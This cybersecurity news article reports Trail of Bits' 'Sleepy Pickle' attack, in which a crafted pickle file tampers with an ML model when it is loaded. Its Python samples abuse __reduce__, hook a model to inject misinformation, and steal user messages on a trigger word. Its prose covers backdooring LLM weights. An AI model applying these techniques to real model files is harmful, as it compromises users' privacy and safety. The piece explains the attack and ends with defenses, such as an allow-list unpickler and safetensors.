Tuesday, June 18, 2024

Sleepy Pickle Exploit Lets Attackers Compromise ML Models And Attack End-Users

Hackers are increasingly targeting ML models, seeking to steal sensitive data, disrupt services, or manipulate outcomes in their favor.

By compromising ML models, attackers can degrade system performance, cause financial losses, and erode the trust and reliability of AI-driven applications.

Cybersecurity analysts at Trail of Bits recently discovered Sleepy Pickle, an exploit that lets threat actors compromise ML models and attack end-users.

Technical Analysis

Researchers unveiled Sleepy Pickle, a novel attack that exploits the insecure Pickle format used to distribute machine learning models.

Unlike previous techniques, which compromise the systems that deploy models, Sleepy Pickle stealthily injects malicious code into the model itself during deserialization.


This allows attackers to modify model parameters to insert backdoors or control outputs, and to hook model methods to tamper with processed data, compromising end-user security, safety, and privacy.

The technique delivers a maliciously crafted pickle file containing both the model and an attacker payload. When the file is deserialized, the payload executes, modifying the in-memory model before it is returned to the victim.
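The root cause is that pickle's `__reduce__` protocol lets the file's author nominate an arbitrary callable that pickle invokes at load time. A minimal sketch, with a hypothetical `payload` function standing in for the real model-patching payload:

```python
import pickle

PAYLOAD_RAN = []  # demo side effect; a real payload would patch the model


def payload():
    # Hypothetical stand-in for Sleepy Pickle's real payload, which would
    # modify the in-memory model; here it only records that it executed.
    PAYLOAD_RAN.append(True)


class SleepyPickle:
    # __reduce__ tells pickle which callable to invoke during
    # deserialization -- the attacker, not the victim, chooses it.
    def __reduce__(self):
        return (payload, ())


malicious_bytes = pickle.dumps(SleepyPickle())  # file shipped to the victim
obj = pickle.loads(malicious_bytes)             # "loading the model" runs payload()
assert PAYLOAD_RAN                              # arbitrary code ran at load time
```

No vulnerability in the victim's own code is needed: simply calling `pickle.loads` (or a pickle-backed loader such as `torch.load` on an untrusted checkpoint) is enough to run the payload.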

Corrupting an ML model via a pickle file injection (Source – Trail of Bits)

Sleepy Pickle offers malicious actors a powerful foothold on ML systems by stealthily injecting payloads that dynamically tamper with models during deserialization. 

This overcomes the limitations of conventional supply chain attacks by leaving no disk traces, customizing payload triggers, and broadening the attack surface to any pickle file in the target’s supply chain. 

Unlike attacks that upload a pre-tampered malicious model, Sleepy Pickle hides its malice until runtime.

Attacks can modify model parameters to insert backdoors, or hook model methods to control inputs and outputs, enabling novel threats such as a generative AI assistant that gives harmful advice after weight-patching poisons the model with misinformation.

The technique’s dynamic, leave-no-trace nature evades static defenses.
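The method-hooking variant can be illustrated with a toy sketch; `TinyModel` and `_hook_generate` are hypothetical stand-ins, not Trail of Bits' code. The payload, run at unpickling time, wraps the model's generation method so every answer is silently altered:

```python
import pickle


class TinyModel:
    """Hypothetical stand-in for a real generative model class."""
    def generate(self, prompt: str) -> str:
        return f"answer to: {prompt}"


def _hook_generate(model):
    # Runs during unpickling: wrap the original method so every output
    # is tampered with before the user ever sees it.
    original = model.generate
    def tampered(prompt):
        return original(prompt) + " [injected misinformation]"
    model.generate = tampered
    return model


class SleepyModel:
    # The pickle file claims to contain a model, but deserializing it
    # hands the victim an already-hooked object.
    def __reduce__(self):
        return (_hook_generate, (TinyModel(),))


model = pickle.loads(pickle.dumps(SleepyModel()))
print(model.generate("is this medicine safe?"))
# -> answer to: is this medicine safe? [injected misinformation]
```

Because the hook lives only on the in-memory object, scanning the model weights on disk reveals nothing unusual.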

Compromising a model to make it generate harmful outputs (Source – Trail of Bits)

LLMs that process sensitive data pose particular risks. Researchers compromised a model to steal private information during inference by injecting code that records user data when triggered by a secret keyword.

Traditional security measures were ineffective as the attack occurred within the model.
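A toy sketch of this data-theft variant, again using hypothetical names: the payload installed at unpickling time records every message the model processes and leaks the buffer through the model's own output when the attacker supplies a trigger word:

```python
import pickle


class ChatModel:
    """Hypothetical stand-in for an LLM wrapper that sees user messages."""
    def reply(self, message: str) -> str:
        return f"reply to: {message}"


_stolen = []  # attacker-controlled buffer hidden inside the process


def _hook_reply(model):
    original = model.reply
    def spying(message):
        _stolen.append(message)        # silently record every message
        if "open-sesame" in message:   # attacker's secret trigger word
            return "\n".join(_stolen)  # leak the buffer via normal output
        return original(message)
    model.reply = spying
    return model


class SleepyChatModel:
    def __reduce__(self):
        # Installed at unpickling time; the victim sees a working model.
        return (_hook_reply, (ChatModel(),))


model = pickle.loads(pickle.dumps(SleepyChatModel()))
model.reply("my card number is 4111-1111-1111-1111")  # recorded silently
leak = model.reply("open-sesame")                     # attacker retrieves it
```

Since the recording happens inside the model object itself, network monitoring and file-integrity checks see nothing until the attacker triggers the exfiltration.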

This novel threat vector underscores the potential for ML systems to be abused beyond traditional attack surfaces.

Compromising a model to steal private user data (Source – Trail of Bits)

In addition, other kinds of applications are at risk, such as browser summarizer apps that improve the user experience by summarizing web pages.

Since users trust these summaries, compromising the underlying model to generate harmful summaries is a realistic threat that lets an attacker serve malicious content.

If altered summaries containing malicious links are returned to users, anyone who clicks such a link can fall victim to phishing scams or malware.

Compromising a model to attack users indirectly (Source – Trail of Bits)

If the application renders returned content that includes JavaScript, the payload could also inject a malicious script.

To mitigate these attacks, use models only from reputable organizations and prefer safer file formats, such as safetensors, that cannot execute code when loaded.
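When pickle cannot be avoided, one defense-in-depth option is an allow-list unpickler that refuses to resolve any global the file references unless it is explicitly permitted. This is only a sketch: such allow-lists are brittle and bypasses have been demonstrated, so a non-executable format like safetensors remains the more robust choice.

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler sketch: only explicitly permitted globals may
    be resolved; anything else a pickle file references (exec, eval,
    os.system, ...) is refused before it can run."""
    ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    def __reduce__(self):
        return (eval, ("1 + 1",))  # stand-in for a real payload


assert safe_loads(pickle.dumps([1, 2, 3])) == [1, 2, 3]  # benign data loads
try:
    safe_loads(pickle.dumps(Evil()))                     # payload is refused
except pickle.UnpicklingError as err:
    print(err)  # blocked global: builtins.eval
```

Overriding `Unpickler.find_class` this way is the restriction mechanism described in the Python standard library documentation itself; it blocks the payload at resolution time, before any attacker-chosen callable is invoked.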


Tushar Subhra Dutta
Tushar is a cybersecurity content editor with years of experience covering cybersecurity news and technology.
